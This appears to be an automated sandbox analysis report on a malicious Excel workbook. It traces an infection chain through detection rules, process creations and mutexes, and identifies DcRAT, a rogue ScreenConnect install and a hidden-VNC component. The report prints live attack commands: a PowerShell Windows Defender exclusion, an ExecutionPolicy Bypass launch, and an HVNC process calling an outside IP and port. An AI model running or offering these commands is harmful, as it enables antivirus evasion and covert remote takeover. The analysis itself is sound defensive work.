                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: String function: 00007FFA208CB4E0 appears 51 times
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: String function: 00007FFA1634B4E0 appears 51 times
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: String function: 00007FF6CFFB7200 appears 32 times
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: String function: 00007FFA1FFAB4E0 appears 51 times
                            Source: Document.exe.12.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: Document.exe.12.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: Document.exe.12.dr | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: Document.exe.12.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: Document.exe.12.dr | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: newpoveno.exe.5.dr | Static PE information: Number of sections : 11 > 10
                            Source: newpoveno.exe.8.dr | Static PE information: Number of sections : 11 > 10
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                            Source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 37.0.Document.exe.7dc3d4.1.raw.unpack, WindowsToolkit.cs | Cryptographic APIs: 'CreateDecryptor'
                            Source: 37.2.Document.exe.55d0000.7.raw.unpack, WindowsToolkit.cs | Cryptographic APIs: 'CreateDecryptor'
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, Settings.cs | Base64 encoded string: 'vmxWSASsER9qtfIwb2UCT2U29glm9qmaRh3bKMh5ba/+8jTxv6tLY3RW18l2+vskxxEI+R2o0a8hiaAkCYpZcQ==', 'jRssRHPasO7sqjIYVlNThUsPcH2m6aMobAkPX7ADcwY4u7St98QWcPhJ6BACRFqDuBEStPpmqLG3xsRjojDMahsWBkpMziG7s9L9/rlBV9d87pJcFcSrM+ACsDBGLaWC', 'ZnZ2C9KFSvHXslpF8qaNa4cNLrqwPLzUhCx3YAsccyPVKid7hXwLsMVRunyRa0b/SQxCHKYPWUFT57XVxIdZEw==', 'yCCq4SfC3sqs64eIBomN0shmCaypDC3cQBAYOs5HyoCxTMxsW+PNGsFzWZfJEZw8qk8Il+wTPXXEUvIkQ3gH7A=='
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, Settings.cs | Base64 encoded string: 'vmxWSASsER9qtfIwb2UCT2U29glm9qmaRh3bKMh5ba/+8jTxv6tLY3RW18l2+vskxxEI+R2o0a8hiaAkCYpZcQ==', 'jRssRHPasO7sqjIYVlNThUsPcH2m6aMobAkPX7ADcwY4u7St98QWcPhJ6BACRFqDuBEStPpmqLG3xsRjojDMahsWBkpMziG7s9L9/rlBV9d87pJcFcSrM+ACsDBGLaWC', 'ZnZ2C9KFSvHXslpF8qaNa4cNLrqwPLzUhCx3YAsccyPVKid7hXwLsMVRunyRa0b/SQxCHKYPWUFT57XVxIdZEw==', 'yCCq4SfC3sqs64eIBomN0shmCaypDC3cQBAYOs5HyoCxTMxsW+PNGsFzWZfJEZw8qk8Il+wTPXXEUvIkQ3gH7A=='
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, Settings.cs | Base64 encoded string: 'vmxWSASsER9qtfIwb2UCT2U29glm9qmaRh3bKMh5ba/+8jTxv6tLY3RW18l2+vskxxEI+R2o0a8hiaAkCYpZcQ==', 'jRssRHPasO7sqjIYVlNThUsPcH2m6aMobAkPX7ADcwY4u7St98QWcPhJ6BACRFqDuBEStPpmqLG3xsRjojDMahsWBkpMziG7s9L9/rlBV9d87pJcFcSrM+ACsDBGLaWC', 'ZnZ2C9KFSvHXslpF8qaNa4cNLrqwPLzUhCx3YAsccyPVKid7hXwLsMVRunyRa0b/SQxCHKYPWUFT57XVxIdZEw==', 'yCCq4SfC3sqs64eIBomN0shmCaypDC3cQBAYOs5HyoCxTMxsW+PNGsFzWZfJEZw8qk8Il+wTPXXEUvIkQ3gH7A=='
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 37.2.Document.exe.55d0000.7.raw.unpack, WindowsExtensions.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                            Source: 37.2.Document.exe.55d0000.7.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 37.2.Document.exe.55d0000.7.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                            Source: 37.0.Document.exe.7dc3d4.1.raw.unpack, WindowsExtensions.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                            Source: 37.0.Document.exe.7dc3d4.1.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 37.0.Document.exe.7dc3d4.1.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, Methods.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 37.2.Document.exe.55b0000.5.raw.unpack, ExeFile.cs | Suspicious method names: .ExeFile.SetPayload
                            Source: 37.2.Document.exe.55b0000.5.raw.unpack, ExeFile.cs | Suspicious method names: .ExeFile.GetOriginalPayload
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, DInvokeCore.cs | Suspicious method names: .DInvokeCore.DynamicAPIInvoke
                            Source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, DInvokeCore.cs | Suspicious method names: .DInvokeCore.DynamicAPIInvoke
                            Source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, DInvokeCore.cs | Suspicious method names: .DInvokeCore.DynamicAPIInvoke
                            Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winXLSM@133/106@50/12
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Code function: 8_2_00007FFA208D8130 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 22_2_00007FFA16358130 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Code function: 27_2_00007FFA1FFB8130 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Document25.xlsm
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Mutant created: NULL
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2852:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_03
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Mutant created: \Sessions\1\BaseNamedObjects\daqyvsbasipyrpcr
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7992:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Mutant created: \Sessions\1\BaseNamedObjects\HVNC_MUTEX
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{EE38F5BB-59B8-41CB-B33F-5E994D439EC1} - OProcSessId.dat
                            Source: Document25.xlsm | OLE indicator, Workbook stream: true
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Windows\explorer.exe
                            Source: unknown | Process created: C:\Windows\explorer.exe
                            Source: unknown | Process created: C:\Windows\explorer.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Windows\explorer.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
                            Source: C:\Windows\System32\svchost.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\TenantRestrictions\Payload
                            Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIBE65.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4046546 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                            Source: AddInProcess32.exe, 0000000C.00000002.6331801761.000000000356D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: Document25.xlsm | Virustotal: Detection: 33%
                            Source: Document25.xlsm | ReversingLabs: Detection: 18%
                            Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                            Source: unknown | Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x -p123456 -y -o"C:\Users\user\AppData\Local\Temp\invoice_temp\" "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.zip"
                            Source: C:\Program Files\7-Zip\7z.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll"
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe"
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                            Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: unknown | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\newpoveno.exe"
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\SystemRootDoc\newpoveno.exe "C:\Users\user\SystemRootDoc\newpoveno.exe"
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                            Source: unknown | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\newpoveno.exe"
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\SystemRootDoc\newpoveno.exe "C:\Users\user\SystemRootDoc\newpoveno.exe"
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                            Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' & exit
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"'
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Document.exe "C:\Users\user\AppData\Local\Temp\Document.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Document.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\ea32d473b92f819d\ScreenConnect.ClientSetup.msi"
                            Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                            Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5F31D207096A70303A87FAA569F8958D C
                            Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIBE65.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4046546 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                            Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9C864324F3ACEEC3843B308126110901
                            Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 56F78CA946A322F1A8337330F29E556C E Global\MSI0000
                            Source: unknown | Process created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-pi5ke2-relay.screenconnect.com&p=443&s=4e491804-ebd1-4ec1-a81d-3bf98af2b16f&k=BgIAAACkAABSU0ExAAgAAAEAAQDV5xr%2f63eUw3yWSiptbv5fNcp0K%2fm1HgCzug%2fuXVLaE7zXcJaALS5LoNDk%2fCtX1DhHiK7zhI%2bKLvNYucmCVNYhfawyE7GKXdStFwcdW3bdG7Bl1wsDbR9V3DCQtHu0RCULGn2CLbfaMYcxT7HUC8TrGSemBF6idtbA81QikNAwKvc0mAXjUuHQgFKNxH34ev1K7FFVTHQQmAfMWifAR3wQA3I8ZCb2o4gfszrm68%2fq2clfPySQ9B17enljE%2b7B1y8UqGY%2brDfKadO%2fAISlRMCNIopaBIw62z2RT8UYqLCAsO4P%2bQQU%2fFWzzNBS%2bocDYGtZaBBqN9vqtk0Ur5xxoDqt"
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe | Process created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exe" "RunRole" "94bdae91-aed5-45b2-b496-05a680474da1" "User"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 176.65.142.74 4448 HVNC_MUTEX
                            Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /NoUACCheck
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /NoUACCheck
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\VenHide" --no-sandbox --allow-no-sandbox-job --disable-accelerated-layers --disable-accelerated-plugins --disable-audio --disable-gpu --disable-d3d11 --disable-accelerated-2d-canvas --disable-deadline-scheduling --disable-ui-deadline-scheduling --aura-no-shadows --mute-audio
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\VenHide" --no-pre-read-main-dll --field-trial-handle=2120,i,14894441107756567341,7342821476491626957,262144 --variations-seed-version=20231002-080120.576000 --mojo-platform-channel-handle=2256 /prefetch:3
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x -p123456 -y -o"C:\Users\user\AppData\Local\Temp\invoice_temp\" "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.zip"Jump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll"Jump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' & exit
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 176.65.142.74 4448 HVNC_MUTEX
                            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
